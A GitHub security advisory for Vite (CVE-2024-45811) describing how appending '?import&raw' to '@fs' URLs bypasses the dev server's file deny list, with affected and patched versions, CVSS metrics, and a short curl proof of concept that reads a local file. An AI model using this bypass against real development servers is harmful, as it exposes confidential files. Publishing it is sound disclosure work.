Skip to content

server.fs.deny bypassed when using ?import&raw

Moderate
patak-dev published GHSA-9cwx-2883-4wfx Sep 17, 2024

Package

npm vite (npm)

Affected versions

>=5.4.0, <=5.4.5
>=5.3.0, <=5.3.5
>=5.0.0, <=5.2.13
>=5.0.0, <=5.1.7
>=4.0.0, <=4.5.3
<=3.2.10

Patched versions

>=5.4.6
>=5.3.6, <5.4.0
>=5.2.14, <5.3.0
>=5.1.8, <5.2.0
>=4.5.5, <5.0.0
>=3.2.11, <4.0.0

Description

Summary

The contents of arbitrary files can be returned to the browser.

Details

@fs denies access to files outside of Vite serving allow list. Adding ?import&raw to the URL bypasses this limitation and returns the file content if it exists.

PoC

$ npm create vite@latest
$ cd vite-project/
$ npm install
$ npm run dev

$ echo "top secret content" > /tmp/secret.txt

# expected behaviour
$ curl "http://localhost:5173/@fs/tmp/secret.txt"

    <body>
      <h1>403 Restricted</h1>
      <p>The request url &quot;/tmp/secret.txt&quot; is outside of Vite serving allow list.

# security bypassed
$ curl "http://localhost:5173/@fs/tmp/secret.txt?import&raw"
export default "top secret content\n"
//# sourceMappingURL=data:application/json;base64,eyJ2...

Severity

Moderate

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Adjacent
Attack complexity
High
Privileges required
None
User interaction
Required
Scope
Unchanged
Confidentiality
High
Integrity
None
Availability
None

CVSS v3 base metrics

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:A/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N

CVE ID

CVE-2024-45811

Weaknesses

Credits